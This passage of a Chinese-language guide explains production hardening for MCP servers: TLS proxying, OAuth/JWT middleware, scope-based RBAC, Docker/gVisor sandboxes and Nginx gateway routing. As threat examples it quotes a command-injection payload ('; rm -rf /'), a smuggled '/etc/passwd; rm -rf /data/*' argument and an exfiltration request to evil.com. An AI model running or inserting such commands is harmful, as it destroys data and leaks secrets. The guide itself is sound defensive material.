MCP协议生产环境实战:安全认证、沙箱隔离与多服务器路由
30秒结论
- 解决什么问题:MCP 官方参考实现和社区示例只覆盖了"跑起来"——没有认证、没有沙箱、没有监控。直接上生产会出安全事故。
- 核心方法:从传输层加固(stdio→Streamable HTTP+TLS)、OAuth 2.1 认证、工具级 RBAC、Docker 沙箱隔离,到多服务器网关路由,构建一套完整的 MCP 生产部署方案。
- 关键结论:生产级 MCP Server 的核心挑战不是协议本身——而是安全、隔离和可观测性。这三样在官方文档里几乎为零,本文填补这个空白。
- 读完能做什么:掌握 MCP 生产加固的完整方案,能对现有 MCP Server 进行安全改造并部署到生产环境。
1. 为什么 MCP 需要生产级加固
从"跑起来"到"跑稳"之间,差了一整个生产环境
2025年,MCP(Model Context Protocol)生态迅速膨胀:社区贡献了上千个 MCP Server,覆盖 GitHub、Slack、Postgres、文件系统、浏览器自动化等几乎所有常用工具。大多数开发者跟着教程 10 分钟就能跑起来一个 MCP Server。
但"跑起来"和"能上生产"之间有巨大的鸿沟:
- 官方参考实现是单进程的——一个客户端连一个 Server,没有连接池、没有负载均衡、没有故障转移。
- 认证是缺失的——stdio 模式下靠进程权限,HTTP 模式下根本没有内置认证机制。谁连上谁就能调用所有工具。
- 工具执行没有隔离——Server 调用
subprocess.run()直接在本机执行。一个文件删除工具就能干掉整个服务器。 - 没有审计追踪——谁在什么时候调了什么工具、传了什么参数、结果是什么,全都无迹可寻。
如果你打算把 MCP Server 暴露给多个用户、多个团队、甚至外部客户——这些问题每一个都是潜在的安全事故。
MCP Server 的威胁模型
在讨论具体加固措施之前,我们需要先明确一个面向多租户的 MCP Server 面临哪些威胁:
| 威胁类别 | 攻击场景 | 后果 |
|---|---|---|
| 未授权访问 | 攻击者直接连接 MCP Server 端点,未提供任何凭证即可调用工具 | 数据泄露、资源滥用、恶意操作执行 |
| 权限提升 | 低权限用户调用超出其角色范围的工具(如只读用户执行删除操作) | 数据被篡改或销毁、系统配置被修改 |
| 命令注入 | 通过工具参数注入恶意命令(如参数中包含 ; rm -rf /) |
服务器被完全控制、数据被加密勒索 |
| 资源耗尽 | 恶意客户端发起大量并发工具调用,耗尽 CPU/内存/连接 | 服务不可用,影响所有合法用户 |
| 数据泄露 | 工具调用过程中读取了不应用于当前用户的敏感数据 | 用户隐私泄露、合规违规 |
| 传输劫持 | 中间人攻击拦截或篡改 stdio 数据流或 HTTP 明文传输 | 认证凭证泄露、工具调用结果被篡改 |
这些不是理论上的威胁。任何一个面向多用户暴露的 MCP Server——无论是内部开发平台的工具网关,还是 SaaS 产品的 Agent 后端——都必然面对至少其中 3-4 类风险。
本指南覆盖什么
本文是 MCP 生产部署的完整指南,覆盖 6 大章节:
- 传输层加固:从 stdio 到 Streamable HTTP + TLS,统一传输切换模式,连接池管理
- 认证与授权:OAuth 2.1 Bearer Token 中间件,工具级 RBAC 装饰器,stdio 环境凭证方案
- 工具沙箱与执行隔离:Docker/gVisor 容器化隔离,文件系统和网络限制,资源限额
- 多服务器路由与网关架构:Nginx 多 MCP 网关配置,工具注册发现,租户感知路由
- 监控、日志与可观测性:OpenTelemetry 链路追踪,结构化日志,Prometheus 指标与告警
从开发到上线的完整路径,一站式补齐 MCP 官方文档缺失的生产部署知识。
前置知识:本文假设你已经理解 MCP 的基础概念——Client/Server 架构、JSON-RPC 2.0、Tools/Resources/Prompts 三大原语。如果还不够熟悉,建议先阅读以下文章:
2. MCP 传输层深度解析
两种传输方式,一个关键选择
MCP 协议在设计上传输无关——协议层的 Tools/Resources/Prompts 不受传输方式影响。但到了生产环境,传输方式的选择直接决定了你的部署架构、安全模型和运维复杂度。
MCP 支持两种传输方式:stdio(标准输入输出)和 Streamable HTTP(基于 HTTP 的流式传输,支持 SSE)。它们的差异不是"一个简单一个复杂",而是适用场景完全不同。
| 维度 | stdio | Streamable HTTP |
|---|---|---|
| 通信方式 | 父进程启动子进程,通过 stdin/stdout 交换 JSON-RPC 消息 | HTTP POST 发送请求,Server-Sent Events (SSE) 流式返回响应 |
| 网络可达性 | 仅限本机,Client 和 Server 必须在同一台机器上 | 可跨网络,支持远程部署和多客户端共享 |
| 并发能力 | 单连接单会话,一个 stdio 通道只能服务一个 Client | 天然支持多客户端并发,HTTP 服务器可同时处理多个会话 |
| 部署复杂度 | 最简单——启动一个进程即可 | 需要 HTTP 服务器、TLS 证书、DNS、负载均衡等基础设施 |
| 安全性 | 依赖操作系统进程权限隔离 | 需要应用层认证(OAuth/JWT)+ 传输层加密(TLS) |
| 断线重连 | 进程崩溃即断连,需父进程重新拉起 | HTTP 是无状态协议,配合 session ID 可实现会话恢复 |
| 典型场景 | Claude Desktop 本地连接、IDE 插件本地工具、单用户开发环境 | SaaS 后端、企业级 Agent 平台、多租户工具网关 |
什么时候用 stdio,什么时候用 Streamable HTTP
用 stdio 的场景:
- 你正在开发阶段,Client 和 Server 在同一台机器上
- 工具只被单个用户使用(如个人 Claude Desktop 配置)
- 工具操作的都是本地资源(本地文件、本地数据库)
- 不需要网络认证——操作系统用户权限已经足够
用 Streamable HTTP 的场景:
- Server 需要被多个 Client(多用户、多应用)同时访问
- Client 和 Server 不在同一台机器上(远程部署)
- 需要细粒度的认证和授权(不同用户有不同的工具权限)
- 需要日志、监控、告警等运维能力
一个简单的判断法则:如果只有你自己用,用 stdio。如果别人也要用,用 Streamable HTTP。
传输切换模式:一个 Server 同时支持两种传输
实际开发中,我们经常遇到这样的需求:开发阶段用 stdio 快速调试,上线后切换到 Streamable HTTP 暴露给外部客户端。如果每次切换都要改 Server 代码,那和"重写一遍"没区别。
正确的做法是:将传输层抽象出来,Server 核心逻辑与传输方式解耦。下面是一个 TypeScript 实现——同一个 MCP Server 既可以作为 stdio 进程启动,也可以作为 HTTP 服务器启动:
// transport.ts — 传输层抽象,一个 Server 同时支持 stdio 和 Streamable HTTP
import { McpServer } from "@modelcontextprotocol/sdk/server";
import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio";
import { StreamableHTTPServerTransport } from "@modelcontextprotocol/sdk/server/streamableHttp";
import express from "express";
// 核心 Server 实例——与传输方式完全无关
const server = new McpServer({
name: "production-mcp-server",
version: "1.0.0",
});
// 注册工具(示例:一个简单的天气查询工具)
server.registerTool("get_weather", {
description: "获取指定城市的天气信息",
inputSchema: {
type: "object",
properties: {
city: { type: "string", description: "城市名称" }
},
required: ["city"]
},
handler: async ({ city }) => {
// 实际业务逻辑...
return { content: [{ type: "text", text: `${city}的天气:晴,22°C` }] };
}
});
// 根据环境变量选择传输方式
const TRANSPORT = process.env.MCP_TRANSPORT || "stdio"; // "stdio" | "http"
async function main() {
if (TRANSPORT === "stdio") {
// stdio 模式:作为子进程运行,适合本地开发和 Claude Desktop
const transport = new StdioServerTransport();
await server.connect(transport);
console.error("MCP Server running on stdio"); // stderr 不影响 stdout 协议通信
} else if (TRANSPORT === "http") {
// Streamable HTTP 模式:作为 HTTP 服务器运行,适合生产部署
const app = express();
// POST /mcp — 接收 JSON-RPC 请求
app.post("/mcp", async (req, res) => {
const transport = new StreamableHTTPServerTransport({
sessionIdGenerator: () => crypto.randomUUID(),
});
await server.connect(transport);
// 将 HTTP 请求转发给 transport 处理
await transport.handleRequest(req, res);
});
// GET /health — 健康检查端点
app.get("/health", (_req, res) => {
res.json({ status: "ok", transport: "http", uptime: process.uptime() });
});
const PORT = parseInt(process.env.MCP_PORT || "3000");
app.listen(PORT, () => {
console.log(`MCP Server (HTTP) listening on port ${PORT}`);
});
}
}
main().catch(console.error);
核心思想:MCP Server 的 Tools/Resources/Prompts 注册逻辑完全不变——你只需要在启动时选择 StdioServerTransport 还是 StreamableHTTPServerTransport。这意味着同一个代码库,开发时一行 npx tsx server.ts 就能跑,部署时设置一个环境变量就能切到 HTTP 模式。
HTTP 传输的生产加固:TLS 终结与连接池
一旦切换到 HTTP 模式,两个基础设施问题必须解决:
TLS 终结
永远不要让 MCP Server 直接暴露在公网上处理 TLS。正确的架构是:
┌──────────┐ HTTPS ┌──────────────┐ HTTP ┌─────────────┐
│ Client │ ────────────────→ │ Nginx/Caddy │ ──────────────→ │ MCP Server │
│ │ ←──────────────── │ (TLS 终结) │ ←────────────── │ (localhost) │
└──────────┘ └──────────────┘ └─────────────┘
使用 Nginx 或 Caddy 作为反向代理处理 TLS 终结:
# nginx.conf — MCP Server 反向代理(TLS 终结 + 连接池)
upstream mcp_backend {
server 127.0.0.1:3000;
# 连接池:复用到后端 MCP Server 的连接
keepalive 32;
keepalive_requests 1000;
keepalive_timeout 60s;
}
server {
listen 443 ssl http2;
server_name mcp.example.com;
# TLS 证书(使用 Let's Encrypt 或企业 CA 签发)
ssl_certificate /etc/ssl/certs/mcp.example.com.pem;
ssl_certificate_key /etc/ssl/private/mcp.example.com.key;
ssl_protocols TLSv1.2 TLSv1.3;
ssl_ciphers HIGH:!aNULL:!MD5;
# 仅转发 /mcp 路径到 MCP Server
location /mcp {
proxy_pass http://mcp_backend;
proxy_http_version 1.1;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header Connection ""; # 支持 keepalive 连接复用
# 超时设置(SSE 流式响应可能持续较长时间)
proxy_read_timeout 300s;
proxy_send_timeout 300s;
}
# 健康检查直接代理
location /health {
proxy_pass http://mcp_backend;
proxy_http_version 1.1;
proxy_set_header Host $host;
}
}
连接池管理
Streamable HTTP 传输的 MCP Server 在底层是一个标准的 HTTP 服务器,连接池管理遵循标准的 HTTP 最佳实践:
- Client 侧:使用 HTTP 客户端的连接池(如 Python
httpx.AsyncClient带limits参数,或 Node.jsundici的Pool),避免每次 JSON-RPC 调用都重建 TCP 连接。 - Server 侧:确保 HTTP 服务器框架(Express、Fastify、Starlette)启用了 keep-alive,配合 Nginx 的
keepalive指令实现连接复用。 - SSE 长连接:Streamable HTTP 的流式响应使用 SSE,一个工具调用可能持续数秒到数分钟。Nginx 的
proxy_read_timeout需要设置为足够大的值(如 300s)以防止误杀正常的长时间工具执行。
3. 认证与授权
一个不可避免的事实:MCP 官方没有内置认证
翻遍 MCP 规范文档和 Python/TypeScript SDK 源码,你不会找到任何关于"如何验证客户端身份"的章节。这是设计上的有意为之——MCP 将认证视为传输层或应用层的职责,不在协议核心中定义。
但这意味着:如果你不做任何处理,任何能访问 MCP Server 端点的人都能调用所有工具。
生产环境中,我们需要两层控制:
- 认证(Authentication):验证"你是谁"——确保请求来自合法的客户端。
- 授权(Authorization):验证"你能做什么"——确保你只能调用你有权限的工具。
OAuth 2.1 Bearer Token 认证(Streamable HTTP)
对于 Streamable HTTP 传输,最成熟的方案是 OAuth 2.1 Bearer Token。客户端在 HTTP 请求头中携带 Authorization: Bearer <token>,Server 端验证 token 的有效性和权限范围。
可引用定义:MCP 认证层是部署在 MCP Server 与外部客户端之间的安全网关层,负责验证客户端身份的合法性(Authentication)和工具调用的权限范围(Authorization)。MCP 协议本身不定义认证机制——认证在传输层(如 TLS 双向认证)或应用层(如 OAuth 2.1)实现。
下面是一个 Python 实现的 Bearer Token 验证中间件,可以嵌入到任何基于 ASGI(Starlette/FastAPI)的 MCP HTTP Server 中:
# auth_middleware.py — MCP HTTP Server 的 OAuth 2.1 Bearer Token 验证中间件
import time
import jwt # PyJWT 库: pip install pyjwt
from starlette.middleware.base import BaseHTTPMiddleware
from starlette.responses import JSONResponse
# ⚠️ 生产环境中从环境变量或密钥管理服务获取,绝不可硬编码
JWT_SECRET = "your-jwt-secret-placeholder" # JWT 签名密钥
JWT_ALGORITHM = "HS256" # 签名算法
ISSUER = "https://auth.example.com" # Token 签发方
class MCPAuthMiddleware(BaseHTTPMiddleware):
"""MCP HTTP Server 认证中间件
验证每个请求的 Bearer Token,提取用户身份和权限范围。
"""
# 不需要认证的路径白名单(如健康检查)
PUBLIC_PATHS = {"/health", "/.well-known/jwks.json"}
async def dispatch(self, request, call_next):
# 白名单路径直接放行
if request.url.path in self.PUBLIC_PATHS:
return await call_next(request)
# 从 Authorization 头提取 Bearer Token
auth_header = request.headers.get("Authorization", "")
if not auth_header.startswith("Bearer "):
return JSONResponse(
{"error": "missing_authorization", "message": "需要 Bearer Token 认证"},
status_code=401,
headers={"WWW-Authenticate": 'Bearer realm="mcp"'}
)
token = auth_header[len("Bearer "):]
# 验证 JWT Token
try:
payload = jwt.decode(
token,
JWT_SECRET,
algorithms=[JWT_ALGORITHM],
issuer=ISSUER,
options={"require": ["exp", "sub", "scope"]}
)
except jwt.ExpiredSignatureError:
return JSONResponse(
{"error": "token_expired", "message": "Token 已过期,请重新获取"},
status_code=401
)
except jwt.InvalidTokenError as e:
return JSONResponse(
{"error": "invalid_token", "message": f"Token 无效: {str(e)}"},
status_code=401
)
# 将用户身份和权限注入到 request.state,后续处理可用
request.state.user_id = payload["sub"] # 用户唯一标识
request.state.scopes = set(payload.get("scope", "").split()) # 权限范围集合
# 记录访问日志(生产环境接入结构化日志系统)
print(f"[AUTH] user={payload['sub']} scopes={request.state.scopes} "
f"path={request.url.path}") # 替换为 structlog
return await call_next(request)
这个中间件做四件事:
- 检查请求头中的 Bearer Token
- 验证 JWT 的签名、有效期和签发方
- 从 Token 中提取用户 ID 和权限范围(scopes)
- 将用户信息注入到请求上下文中,方便后续的工具调用链路使用
Token 的签发由独立的认证服务(如 Okta、Auth0、Keycloak,或国内的企业微信 SSO、阿里云 IDaaS)完成。MCP Server 只做验证,不做签发——这是 OAuth 2.1 标准的最佳实践。
工具级 RBAC:谁能调用哪个工具
认证只解决了"你是谁"。更大的问题是"你能调哪个工具"。
考虑一个典型的内部开发平台 MCP Server,暴露了这些工具:
deploy_service— 部署服务到生产环境(仅 DevOps)read_logs— 读取应用日志(开发和 DevOps)query_metrics— 查询监控指标(全体团队成员)delete_cluster— 删除 Kubernetes 集群(仅管理员)
不同团队角色能调的工具完全不同。我们需要一个工具级的 RBAC(基于角色的访问控制)机制。
下面是一个 Python 实现的 @require_scope 装饰器——只需要在工具函数上加一行注解,就能定义该工具需要的权限:
# rbac.py — MCP 工具级 RBAC 装饰器
from functools import wraps
from typing import List
class PermissionDeniedError(Exception):
"""权限不足异常——当用户尝试调用超出其权限范围的工具时抛出"""
def __init__(self, required_scopes: List[str], user_scopes: set):
self.required_scopes = required_scopes
self.user_scopes = user_scopes
super().__init__(
f"权限不足。需要: {required_scopes}, 当前用户拥有: {user_scopes}"
)
def require_scope(*required_scopes: str):
"""工具级 RBAC 装饰器
用法:
@require_scope("deploy:write")
async def deploy_service(params): ...
支持多权限组合(需同时满足):
@require_scope("admin:read", "cluster:write")
"""
required = set(required_scopes)
def decorator(func):
@wraps(func)
async def wrapper(ctx, **kwargs):
# 从请求上下文中获取当前用户的权限范围
# ctx 是由 MCP SDK 传入的 RequestContext,需在中间件中注入 user_scopes
user_scopes = getattr(ctx, "user_scopes", set())
# 检查用户是否拥有所有必需的权限
missing = required - user_scopes
if missing:
raise PermissionDeniedError(
required_scopes=list(required),
user_scopes=user_scopes
)
# 权限检查通过,执行实际的工具逻辑
return await func(ctx, **kwargs)
return wrapper
return decorator
# ========== 使用示例:在 MCP Server 中注册带权限控制的工具 ==========
# 假设 MCP Server 框架提供了类似的 register_tool 接口
# 以下为伪代码,展示装饰器的实际用法
# 部署服务到生产 — 需要 deploy:write 权限
@require_scope("deploy:write")
async def deploy_service(ctx, service_name: str, tag: str):
"""部署指定服务到生产环境"""
# 触发 CI/CD pipeline,执行滚动更新...
return f"服务 {service_name}:{tag} 部署已触发"
# 读取应用日志 — 需要 log:read 权限
@require_scope("log:read")
async def read_logs(ctx, service_name: str, lines: int = 100):
"""读取指定服务的最近 N 行日志"""
# 从日志聚合系统(如 ELK/Loki)拉取日志...
return f"[{service_name}] 最近 {lines} 行日志..."
# 查询监控指标 — 需要 metrics:read 权限
@require_scope("metrics:read")
async def query_metrics(ctx, metric_name: str, time_range: str):
"""查询指定监控指标"""
# 从 Prometheus/Grafana 查询指标...
return f"{metric_name} 在 {time_range} 内的数据..."
# 删除集群 — 需要 cluster:admin 权限(最高敏感度)
@require_scope("cluster:admin")
async def delete_cluster(ctx, cluster_name: str, confirmation: str):
"""删除 Kubernetes 集群(危险操作,需二次确认)"""
if confirmation != f"DELETE-{cluster_name}":
raise ValueError("确认字符串不匹配,操作已取消")
# 执行集群删除...
return f"集群 {cluster_name} 删除已启动"
这个 RBAC 方案的精髓在于声明式权限控制:
- 对开发者:写一个新工具时,思考一下这个操作应该谁来做,加一个
@require_scope("xxx:write")即可。不需要写if/else权限判断逻辑。 - 对安全审计:每个工具需要的权限一目了然——直接看装饰器参数就知道。
- 对运维:权限范围(scopes)在 OAuth Token 签发时确定,MCP Server 只做验证。权限变更不需要改代码。
权限范围(scope)的命名建议采用 <resource>:<action> 格式,如 deploy:write、log:read、cluster:admin。这种格式清晰、可读、易于扩展到新的工具类别。
stdio 传输的认证方案:环境凭证
stdio 传输模式下,Client 和 Server 在同一台机器上,通过进程间通信交换 JSON-RPC 消息。这种场景下不需要 OAuth 2.1——网络认证没有意义,因为通信根本不经过网络。
stdio 模式的认证依赖于操作系统级别的进程隔离和环境变量注入:
# claude_desktop_config.json — Claude Desktop 的 MCP Server 配置示例
{
"mcpServers": {
"production-tools": {
"command": "python",
"args": ["-m", "mcp_server"],
"env": {
"MCP_TRANSPORT": "stdio",
"MCP_API_KEY": "your-api-key-placeholder",
"MCP_USER_ROLE": "developer",
"MCP_ALLOWED_TOOLS": "read_logs,query_metrics"
}
}
}
}
Server 端读取环境变量来验证身份和限制权限:
# stdio_auth.py — stdio 模式下的环境变量认证
import os
def get_stdio_identity():
"""从环境变量中读取 stdio 连接的身份和权限信息
由 Client(如 Claude Desktop)在启动 Server 进程时注入。
"""
api_key = os.environ.get("MCP_API_KEY")
if not api_key:
raise RuntimeError("stdio 模式需要 MCP_API_KEY 环境变量")
# 在生产环境中,这里应该调用认证服务验证 API Key 的有效性
# 对于高安全要求的场景,可结合 mTLS 或 Unix Socket 权限控制
user_role = os.environ.get("MCP_USER_ROLE", "viewer")
allowed_tools = os.environ.get("MCP_ALLOWED_TOOLS", "").split(",")
return {
"api_key": api_key,
"role": user_role,
"allowed_tools": [t.strip() for t in allowed_tools if t.strip()],
}
stdio 的认证方案总结为三条原则:
- 密钥通过环境变量注入——绝不在代码或配置文件中硬编码。
- 工具白名单——通过
MCP_ALLOWED_TOOLS环境变量限制当前 Server 实例可用的工具,即便代码中注册了 20 个工具,只有白名单中的才会暴露给 LLM。 - 最小权限——每个 stdio Server 实例只获得完成当前任务所需的最小权限集。切换任务?重启一个更受限的实例。
认证方案总结
| 传输方式 | 认证方案 | 适用场景 | 国内生态推荐 |
|---|---|---|---|
| Streamable HTTP | OAuth 2.1 + JWT Bearer Token + scope-based RBAC | 多租户 SaaS、企业 Agent 平台、公网暴露的 MCP 网关 | 阿里云 IDaaS、企业微信 SSO、Authing |
| stdio | 环境变量注入 API Key + 工具白名单 | Claude Desktop 本地集成、IDE 插件、单用户开发环境 | 不适用(本地进程通信) |
认证和授权是 MCP 生产加固的第一道防线。但即便认证通过了,工具执行本身仍然危险——一个合法的用户调用了合法的工具,但工具内部执行了恶意命令怎么办?这就是下一章要解决的问题:工具沙箱与执行隔离。
如果对 Agent 工具设计还需要更多背景,建议阅读:
4. 工具沙箱与执行隔离
一个工具调用,就是一段不受信任的代码
认证和授权确保"谁"能调用"哪个工具"。但即便是一个合法的用户调了一个合法的工具,工具内部的执行逻辑仍然可能造成破坏——因为 LLM 生成的参数是不可预测的。
考虑一个文件操作工具 search_files,它接受一个 pattern 参数:
- 正常调用:
pattern="*.log"— 搜索日志文件 - 恶意/LLM 幻觉调用:
pattern="/etc/passwd; rm -rf /data/*"— 如果工具内部用了shell=True,这就是灾难
沙箱隔离的核心原则是:工具执行环境与宿主环境完全隔离。即便工具内部执行了恶意命令、消耗了过量资源、写入了不应该写的位置——宿主机和其他租户不受影响。
方案一:Docker 容器沙箱(生产推荐)
Docker 是最成熟的进程隔离方案,适合大多数生产场景。思路是:每个工具调用都在一个全新的 Docker 容器中执行,执行完毕后立即销毁。
下面是 Python 实现的 Docker 沙箱执行器:
# sandbox_executor.py — Docker 容器沙箱执行器
import subprocess
import uuid
import json
from typing import Dict, Optional
from dataclasses import dataclass
@dataclass
class SandboxConfig:
"""沙箱配置——每个工具调用独立的资源限制"""
image: str = "mcp-sandbox:latest" # 沙箱基础镜像
cpu_limit: str = "0.5" # CPU 核心数上限
memory_limit: str = "256m" # 内存上限
timeout_seconds: int = 30 # 执行超时
network_mode: str = "none" # 网络隔离:none=完全断网
read_only_root: bool = True # 根文件系统只读
tmpfs_size: str = "64m" # 临时文件系统大小
workspace_dir: str = "/workspace" # 容器内工作目录
class DockerSandboxExecutor:
"""Docker 沙箱执行器
每个工具调用在一个全新容器中执行,调用完毕后自动销毁。
"""
def __init__(self, config: SandboxConfig = SandboxConfig()):
self.config = config
def execute(self, tool_name: str, command: list, env: Dict[str, str] = None) -> Dict:
"""在隔离的 Docker 容器中执行命令
Args:
tool_name: 工具名称(用于容器命名和日志)
command: 要执行的命令和参数列表(绝不用 shell=True)
env: 环境变量
Returns:
包含 stdout, stderr, exit_code, duration 的字典
"""
container_name = f"mcp-sandbox-{tool_name}-{uuid.uuid4().hex[:8]}"
docker_cmd = [
"docker", "run",
"--rm", # 执行完毕后自动删除容器
"--name", container_name,
# 资源限制
"--cpus", self.config.cpu_limit,
"--memory", self.config.memory_limit,
"--memory-swap", self.config.memory_limit, # 禁用 swap
# 文件系统限制
"--read-only", # 根文件系统只读
"--tmpfs", f"/tmp:{self.config.tmpfs_size},noexec,nosuid",
# 网络隔离
"--network", self.config.network_mode,
# 安全加固
"--security-opt", "no-new-privileges", # 禁止权限提升
"--cap-drop", "ALL", # 移除所有 Linux capabilities
# 工作目录
"-w", self.config.workspace_dir,
# 镜像和命令
self.config.image,
] + command # 直接传递命令列表,不使用 shell
try:
result = subprocess.run(
docker_cmd,
capture_output=True,
text=True,
timeout=self.config.timeout_seconds,
env=env or {},
)
return {
"tool": tool_name,
"container": container_name,
"exit_code": result.returncode,
"stdout": result.stdout[:10000], # 截断输出,防止日志爆炸
"stderr": result.stderr[:10000],
"killed_by_timeout": False,
}
except subprocess.TimeoutExpired:
# 超时后强制清理容器
subprocess.run(["docker", "rm", "-f", container_name],
capture_output=True)
return {
"tool": tool_name,
"container": container_name,
"exit_code": -1,
"stdout": "",
"stderr": "",
"killed_by_timeout": True,
}
沙箱基础镜像的 Dockerfile:
# Dockerfile.sandbox — MCP 工具沙箱基础镜像
FROM python:3.12-slim
# 创建非 root 用户(容器内禁止以 root 运行)
RUN groupadd -r sandbox && useradd -r -g sandbox -d /workspace sandbox
# 工作目录
RUN mkdir -p /workspace && chown sandbox:sandbox /workspace
# 安装工具执行所需的最小依赖(按需添加,越少越好)
RUN pip install --no-cache-dir requests==2.31.0
# 切换到非 root 用户
USER sandbox
WORKDIR /workspace
# 默认入口:不做任何事(由 docker run 的命令参数覆盖)
ENTRYPOINT ["python", "-c"]
方案二:gVisor(更强隔离需求)
对于高安全要求的场景(如多租户 SaaS、金融、医疗),Docker 的共享内核隔离可能不够——容器和宿主机共用同一个 Linux 内核,内核漏洞可能被利用来越狱。
gVisor(Google 开源)提供了一个用户态内核,在容器和宿主机内核之间增加一层隔离:
┌─────────────────────────────────────┐
│ 工具进程(Python) │
├─────────────────────────────────────┤
│ gVisor 用户态内核 │ ← Sentry (系统调用拦截)
├─────────────────────────────────────┤
│ 宿主机 Linux 内核 │ ← 真正的内核
└─────────────────────────────────────┘
gVisor 的使用方式几乎与 Docker 相同——只需要在 Docker 命令中添加 --runtime=runsc:
# 使用 gVisor runtime 替代 Docker 默认的 runc
docker run --runtime=runsc --rm \
--cpus="0.5" --memory="256m" \
--network=none \
--read-only \
mcp-sandbox:latest \
python -c "print('hello from gVisor sandbox')"
在 Python 沙箱执行器中,只需添加一个运行时配置参数即可切换:
# sandbox_executor.py 中添加 gVisor 支持
class DockerSandboxExecutor:
def __init__(self, config: SandboxConfig = SandboxConfig(),
runtime: str = "runc"): # "runc" | "runsc"
self.runtime = runtime
def _build_docker_cmd(self, command: list) -> list:
cmd = ["docker", "run", "--rm"]
if self.runtime == "runsc":
cmd += ["--runtime", "runsc"]
# ... rest of the command building
return cmd
网络出口控制
MCP 工具通常不需要访问外网——如果工具调了 requests.get("https://evil.com/steal?data=..."),就可能泄露敏感信息。网络控制策略:
| 策略级别 | Docker 参数 | 效果 | 适用场景 |
|---|---|---|---|
| 完全断网 | --network=none |
容器内无任何网络接口,连 localhost 都没有 | 文件操作、本地计算、纯数据处理工具 |
| 仅内网 | --network=mcp-internal |
只能访问指定的内部 Docker 网络,不能出公网 | 需要访问内部 API 或数据库的工具 |
| 白名单 | 自定义 iptables 规则 | 只允许访问特定 IP 或域名 | 需要调用特定外部 API(如天气查询)的工具 |
| 不限 | --network=bridge |
容器可自由访问外网 | 不推荐用于生产 MCP 工具 |
默认策略应该是 --network=none——只有少数确实需要网络访问的工具才在白名单中开启受限网络。
三种隔离方案对比
| 维度 | 无沙箱 | Docker(runc) | gVisor(runsc) |
|---|---|---|---|
| 进程隔离 | ❌ 无——工具直接在宿主机进程空间执行 | ✅ namespace + cgroups 隔离 | ✅ 用户态内核隔离,更强 |
| 文件系统隔离 | ❌ 可读写宿主机所有文件(取决于进程用户权限) | ✅ 根文件系统只读 + tmpfs,独立文件系统视图 | ✅ 同 Docker,且系统调用经过过滤 |
| 网络隔离 | ❌ 可访问宿主机所有网络 | ✅ --network=none 或自定义网络策略 |
✅ 同 Docker,用户态网络栈更安全 |
| 资源限制 | ❌ 无——一个工具可耗尽宿主机资源 | ✅ CPU/memory cgroups 硬限制 | ✅ 同 Docker,额外开销约 5-10% |
| 内核漏洞防御 | ❌ 内核漏洞直接威胁宿主机 | ⚠️ 共享宿主机内核,内核漏洞可越狱 | ✅ 用户态内核拦截系统调用,内核漏洞难以利用 |
| 启动延迟 | ✅ 无 | ✅ ~100-500ms | ⚠️ ~200-800ms(额外的用户态内核初始化) |
| 运维复杂度 | ✅ 无需额外组件 | ✅ Docker 引擎(几乎标配) | ⚠️ 需安装 gVisor + containerd 配置 |
| 推荐场景 | 仅开发环境、个人工具 | 生产环境默认方案 | 多租户 SaaS、金融、医疗等高安全场景 |
生产环境选择建议:从 Docker 开始。Docker 的 namespace + cgroups 隔离对 99% 的场景已经足够。只有当你在服务多个外部客户、工具执行高度不可信代码(如用户上传的自定义脚本)、或者有合规要求时,才考虑升级到 gVisor。
如果对 Agent 工具设计和框架实现还需要更多背景,建议阅读:
5. 多服务器路由与网关架构
一个 MCP Server 不够,你需要一个 MCP 网关
单个 MCP Server 暴露一组工具的模式只能支撑简单场景。随着 Agent 平台的发展,真实的架构需求是:
- 多个 MCP Server 各自管理不同领域的工具——文件系统、数据库、第三方 API(Slack、GitHub、Jira)
- 统一入口——客户端只需要知道一个 MCP 端点,而不是 N 个
- 按工具路由——调用
search_files自动路由到文件系统 Server,调用query_db路由到数据库 Server - 租户隔离——不同租户的请求路由到不同的后端实例,数据和资源完全隔离
这就是 MCP 网关的职责。
Nginx 多 MCP 网关配置
对于大多数团队,Nginx 作为 MCP 网关是一个轻量且成熟的方案。通过 URL 路径将请求路由到不同的 MCP Server 后端:
# nginx-mcp-gateway.conf — MCP 多服务器网关配置
# 统一入口: https://mcp-gateway.example.com
# 文件系统 MCP Server 后端(内部端口 3001)
upstream mcp_filesystem {
server 127.0.0.1:3001 weight=1 max_fails=3 fail_timeout=30s;
server 127.0.0.1:3011 weight=1 max_fails=3 fail_timeout=30s; # 备用实例
keepalive 32;
}
# 数据库 MCP Server 后端(内部端口 3002)
upstream mcp_database {
least_conn; # 最少连接数负载均衡——数据库操作耗时差异大
server 127.0.0.1:3002 weight=1 max_fails=3 fail_timeout=30s;
server 127.0.0.1:3012 weight=1 max_fails=3 fail_timeout=30s;
keepalive 16;
}
# Slack/GitHub 等第三方 API MCP Server(内部端口 3003)
upstream mcp_integrations {
ip_hash; # IP 哈希——保持同一客户端的会话粘性
server 127.0.0.1:3003 weight=1 max_fails=3 fail_timeout=30s;
server 127.0.0.1:3013 weight=1 max_fails=3 fail_timeout=30s;
keepalive 16;
}
server {
listen 443 ssl http2;
server_name mcp-gateway.example.com;
# TLS 配置(同前)
ssl_certificate /etc/ssl/certs/mcp-gateway.example.com.pem;
ssl_certificate_key /etc/ssl/private/mcp-gateway.example.com.key;
ssl_protocols TLSv1.2 TLSv1.3;
# === 按 URL 路径路由到不同 MCP Server ===
# 文件系统工具:/mcp/filesystem → mcp_filesystem 后端
location /mcp/filesystem {
proxy_pass http://mcp_filesystem;
proxy_http_version 1.1;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-MCP-Tool-Category "filesystem";
proxy_set_header Connection "";
proxy_read_timeout 120s;
proxy_send_timeout 120s;
}
# 数据库工具:/mcp/database → mcp_database 后端
location /mcp/database {
proxy_pass http://mcp_database;
proxy_http_version 1.1;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-MCP-Tool-Category "database";
proxy_set_header Connection "";
proxy_read_timeout 300s; # 数据库查询可能较慢
proxy_send_timeout 300s;
}
# 第三方集成工具:/mcp/integrations → mcp_integrations 后端
location /mcp/integrations {
proxy_pass http://mcp_integrations;
proxy_http_version 1.1;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
